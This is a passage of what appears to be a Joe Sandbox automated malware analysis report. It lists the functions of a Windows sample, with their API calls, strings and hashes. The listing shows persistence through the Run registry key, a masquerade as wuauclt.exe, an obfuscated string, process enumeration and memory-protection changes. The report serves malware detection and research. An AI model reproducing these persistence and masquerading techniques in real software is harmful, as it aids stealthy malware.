                                                                            • RtlDeleteCriticalSection.NTDLL(0040A5B0), ref: 0040194C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                            • String ID:
                                                                            • API String ID: 3782394904-0
                                                                            • Opcode ID: 1e6658f3a1c7c09b26b832841b6dc3e54d0db2190f45ee9201c8f0ac4b0f75cc
                                                                            • Instruction ID: 59a79e90b1042c7fa72c1bdd4368158aee1beb707aa836db6f4ae4b0191b2b59
                                                                            • Opcode Fuzzy Hash: 1e6658f3a1c7c09b26b832841b6dc3e54d0db2190f45ee9201c8f0ac4b0f75cc
                                                                            • Instruction Fuzzy Hash: 171160B1604340AEE715AB659D92F1337A8B74A708F14843BF200BA6F2D67D98A0D71E
                                                                            Function 00407F54 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 56sleepCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • Sleep.KERNEL32(001B7740,00000000,00408012,?,00000000,00000000,00000000), ref: 00407F70
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                              • Part of subcall function 00406708: InternetGetConnectedState.WININET(?,00000000), ref: 00406717
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407FD9
                                                                            • l}+2, xrefs: 00407F7F
                                                                            • wuauclt.exe, xrefs: 00407FBF
                                                                            • Microsoft, xrefs: 00407FD4
                                                                            • Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407F95
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CloseConnectedDirectoryInternetSleepStateValueWindows
                                                                            • String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
                                                                            • API String ID: 3088811538-3788782062
                                                                            • Opcode ID: 2bd880a330ccf7098cd0f064fbb41e6f7692dc24caeb265b28b5c7e1db9d23fc
                                                                            • Instruction ID: 026fbd7338b316a051164a3f2916be19fdbad90e0342d7335669e4ba070194ba
                                                                            • Opcode Fuzzy Hash: 2bd880a330ccf7098cd0f064fbb41e6f7692dc24caeb265b28b5c7e1db9d23fc
                                                                            • Instruction Fuzzy Hash: 8F112170740204ABE701BAA5D913B5D77A8DB84708F61807FF540BB2D2CFBD9E04966D
                                                                            Function 005318B2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88synchronizationthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00534348), ref: 005318FC
                                                                            • FindCloseChangeNotification.KERNEL32(?), ref: 0053192E
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00001856,00000000,?), ref: 00531981
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2039572472.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_530000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Create$ChangeCloseFindMutexNotificationThread
                                                                            • String ID: $CS$HCS
                                                                            • API String ID: 3723544443-672069553
                                                                            • Opcode ID: 44da6da03f1db095d343fef24bdce93df3bd47e21fcd77e076c34890f7da35c3
                                                                            • Instruction ID: c9d8207afee19221d661383ec636829f3ca9a533000a28e35a20a856c4037f4e
                                                                            • Opcode Fuzzy Hash: 44da6da03f1db095d343fef24bdce93df3bd47e21fcd77e076c34890f7da35c3
                                                                            • Instruction Fuzzy Hash: A221C331500A04BBC7255BB2AC4CE7F7F7DFBA9795F10081AF206D2220DB349849EA78
                                                                            Function 0053151B Relevance: 6.1, APIs: 4, Instructions: 84processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0053158E
                                                                            • Process32First.KERNEL32(00000000,00000000), ref: 005315A9
                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 005315F1
                                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 005315FF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2039572472.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_530000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 3243318325-0
                                                                            • Opcode ID: c72da45e599b28c7d0edcca666fad09cbb784da37aed8e2f8db903f8ebd3e858
                                                                            • Instruction ID: 159f9d4025681f1ee254c6f8235d1b0752aead8523d0c164bde0ddbe7d7545ec
                                                                            • Opcode Fuzzy Hash: c72da45e599b28c7d0edcca666fad09cbb784da37aed8e2f8db903f8ebd3e858
                                                                            • Instruction Fuzzy Hash: 3621B235900618ABDB219BB5DC49BEEBFB8BF44361F1440A5F905E3180DB749F88DE68
                                                                            Function 0043834B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004383ED
                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 00438509
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$FreeProtect
                                                                            • String ID: @O:r
                                                                            • API String ID: 2581862158-1513391029
                                                                            • Opcode ID: 62998878eee791b55a4525ffa1200409ee62ec3c0713ca06769709f58399dcba
                                                                            • Instruction ID: 1c248bd57497abf13f7211ff5bbec31fcd2e4003a81eef7960cbaa05da7696eb
                                                                            • Opcode Fuzzy Hash: 62998878eee791b55a4525ffa1200409ee62ec3c0713ca06769709f58399dcba
                                                                            • Instruction Fuzzy Hash: D25139322043169FE7258B18CC907E6F7A1EF99314F38506EF9498B781EB79AC42CB54
                                                                            Function 0053144D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74threadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 005311B6: VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,005316A6,00001000), ref: 005311C3
                                                                            • PostThreadMessageA.USER32(00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 005314EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2039572472.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_530000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocMessagePostThreadVirtual
                                                                            • String ID: xCS$xCS
                                                                            • API String ID: 1881464792-3893400034
                                                                            • Opcode ID: af53d2dbedeae5b118e693cdc33f52ba4f9957edaef15deec4c71326dbc5f689
                                                                            • Instruction ID: 34e7f80f565ddf980a7cb78d34ba227333c473b334a6997c041f1120bed2be15
                                                                            • Opcode Fuzzy Hash: af53d2dbedeae5b118e693cdc33f52ba4f9957edaef15deec4c71326dbc5f689
                                                                            • Instruction Fuzzy Hash: B5114D72901519BACF20ABB19C8DDEF7F6CEF85754F100461FA09D2100EA349A49DBA4
                                                                            Function 00700000 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,0000116C,00001000,00000004), ref: 007000A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.2018675684.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_700000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID: -
                                                                            • API String ID: 4275171209-2547889144
                                                                            • Opcode ID: e4a18ab6a6c0e9bdc92e7bbfef9058a5b763e4d299425c6ffac95ad41b1d133a
                                                                            • Instruction ID: 4166b81ffa788d98eec51b05f68dab8a27596673f017a6c03852e6622b23dc0e
                                                                            • Opcode Fuzzy Hash: e4a18ab6a6c0e9bdc92e7bbfef9058a5b763e4d299425c6ffac95ad41b1d133a
                                                                            • Instruction Fuzzy Hash: 3A2134716483429FD314CA54CC45F6BB7E4EBD8320F088A2CF9959B3C2D779A909C7A2
                                                                            Function 00402EB0 Relevance: 4.6, APIs: 3, Instructions: 69fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(?,C0000000,?,00000000,00000002,00000080,00000000,?,00000000,?,00402FAB,00406977,00000000,00406C22), ref: 00402F4B
                                                                            • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00402FAB,00406977,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402F6B
                                                                            • GetLastError.KERNEL32(000000F5,?,00000000,?,00402FAB,00406977,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402F7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorFileHandleLast
                                                                            • String ID:
                                                                            • API String ID: 1572049330-0
                                                                            • Opcode ID: 1fe4482e51c97fcd3ab156c21462874b1d18ea82579e8d9af765361da5b48797
                                                                            • Instruction ID: 8895028cb5cdc15445adb39e81ddeb6a4987250684acebc896c500d1f95e65c5
                                                                            • Opcode Fuzzy Hash: 1fe4482e51c97fcd3ab156c21462874b1d18ea82579e8d9af765361da5b48797
                                                                            • Instruction Fuzzy Hash: 4A11086120010296E7149F59CA8C71765649F84358F28C37BE8097F3E6D6FCCC85939D
                                                                            Function 00404B70 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValue
                                                                            • String ID:
                                                                            • API String ID: 849931509-0
                                                                            • Opcode ID: f6903086ebc016dd7e1dc51a1f88265785295860ed41db1915025e2c118f5eb5
                                                                            • Instruction ID: 2826a8d518f421b74224b4c9e13106b3c01b6d5214c42722886c747e2e10fd3a
                                                                            • Opcode Fuzzy Hash: f6903086ebc016dd7e1dc51a1f88265785295860ed41db1915025e2c118f5eb5
                                                                            • Instruction Fuzzy Hash: F801E1B0A04204AFDB40FFA9D84295EBBFCEF48704F5044BAB504F3691DA38DA009628
                                                                            Function 00404C18 Relevance: 4.5, APIs: 3, Instructions: 40registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404BFC: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,00000000,00404C35,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C0C
                                                                            • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Close$OpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 1607946009-0
                                                                            • Opcode ID: de490e853962903b2a5689227c4e63d122a59ebf74e7772f1ca70b50c0b4eacb
                                                                            • Instruction ID: 4b701f08789f1177e28b55cf3da9d2e9372874710ef882e2c23d1ca645a241ff
                                                                            • Opcode Fuzzy Hash: de490e853962903b2a5689227c4e63d122a59ebf74e7772f1ca70b50c0b4eacb
                                                                            • Instruction Fuzzy Hash: 56F049F160421866D700EB958C81FDE777C9B44354F0041ABBA45F7282D6789F408BE9
                                                                            Function 00404ACC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00404AED
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00404AEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                            • API String ID: 2289755597-1428018034
                                                                            • Opcode ID: 5b4352bfc4d5184ded5f790e2a42e1a0fdd6f660e7ca3fdf0ef6e17b68d8ca19
                                                                            • Instruction ID: f4ecd25457bc41be08a6e23874f29c63b64927a4b92a18da8b30fdf3cb70f2a0
                                                                            • Opcode Fuzzy Hash: 5b4352bfc4d5184ded5f790e2a42e1a0fdd6f660e7ca3fdf0ef6e17b68d8ca19
                                                                            • Instruction Fuzzy Hash: 39D05EB235C30079E31D96548C43FBA73949794F10F20461EB3A66A1C0DAB07504961D
                                                                            Function 004038E0 Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 00403965
                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 0040399A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ExitFreeLibraryProcess
                                                                            • String ID:
                                                                            • API String ID: 1404682716-0
                                                                            • Opcode ID: 0face7e6a07afa4f99c73d468a9f1e343faa34a2b1e5e58e08866c2428f9d067
                                                                            • Instruction ID: 1df635f73e8d6915756eab4c5c951cbada66195828d5823cced2058d235b0013
                                                                            • Opcode Fuzzy Hash: 0face7e6a07afa4f99c73d468a9f1e343faa34a2b1e5e58e08866c2428f9d067
                                                                            • Instruction Fuzzy Hash: 93214CF09002419BDB20AF6984887567ED96B44316F28857BE848B72D6D7BCCEC0CB59
                                                                            Function 004038D8 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 00403965
                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 0040399A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ExitFreeLibraryProcess
                                                                            • String ID:
                                                                            • API String ID: 1404682716-0
                                                                            • Opcode ID: 34b4af9424ecf88636d9b1d120e9cda0082e90ba4aa25ef423796a56350a7c74
                                                                            • Instruction ID: e102d307cc8d2ba104a24443bf267b0a457ef6f3725beea8bc8804b3aaa65652
                                                                            • Opcode Fuzzy Hash: 34b4af9424ecf88636d9b1d120e9cda0082e90ba4aa25ef423796a56350a7c74
                                                                            • Instruction Fuzzy Hash: 23214AF09002419EDB20AF6984887567FE86F45316F1884BBE444A62D6D7BCCAC0CA5A
                                                                            Function 004038DC Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 00403965
                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 0040399A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ExitFreeLibraryProcess
                                                                            • String ID:
                                                                            • API String ID: 1404682716-0
                                                                            • Opcode ID: 7f65ca9c6e4620e585d9556c48294706103df5a0fdade0584281f7ed769f9ece
                                                                            • Instruction ID: fd5089775d46e85b253662f2f7318a69e1a8033d09b585e59d9f2ef21dff18ec
                                                                            • Opcode Fuzzy Hash: 7f65ca9c6e4620e585d9556c48294706103df5a0fdade0584281f7ed769f9ece
                                                                            • Instruction Fuzzy Hash: A0213DF09002419ADB20AF6984887567EE86F44316F14857BE444B62D6D7BCCEC0CA5D
                                                                            Function 00402AFC Relevance: 3.1, APIs: 2, Instructions: 60fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00402B26
                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00402B2D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastRead
                                                                            • String ID:
                                                                            • API String ID: 1948546556-0
                                                                            • Opcode ID: 8f9e5a5cc88b9b448b3ca2ccaa60d9936ffcce192d438f27d05647225e30c127
                                                                            • Instruction ID: a1f473cf3bc07306b130f529efb15ea380eb81567c08e13a342af83bccae4885
                                                                            • Opcode Fuzzy Hash: 8f9e5a5cc88b9b448b3ca2ccaa60d9936ffcce192d438f27d05647225e30c127
                                                                            • Instruction Fuzzy Hash: E611FE71A00109EFDB40DF69CA45A9EB7F8EF58350B108477E808EB2C0E6B4EE009765
                                                                            Function 00404AF8 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404ACC: RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00404AED
                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
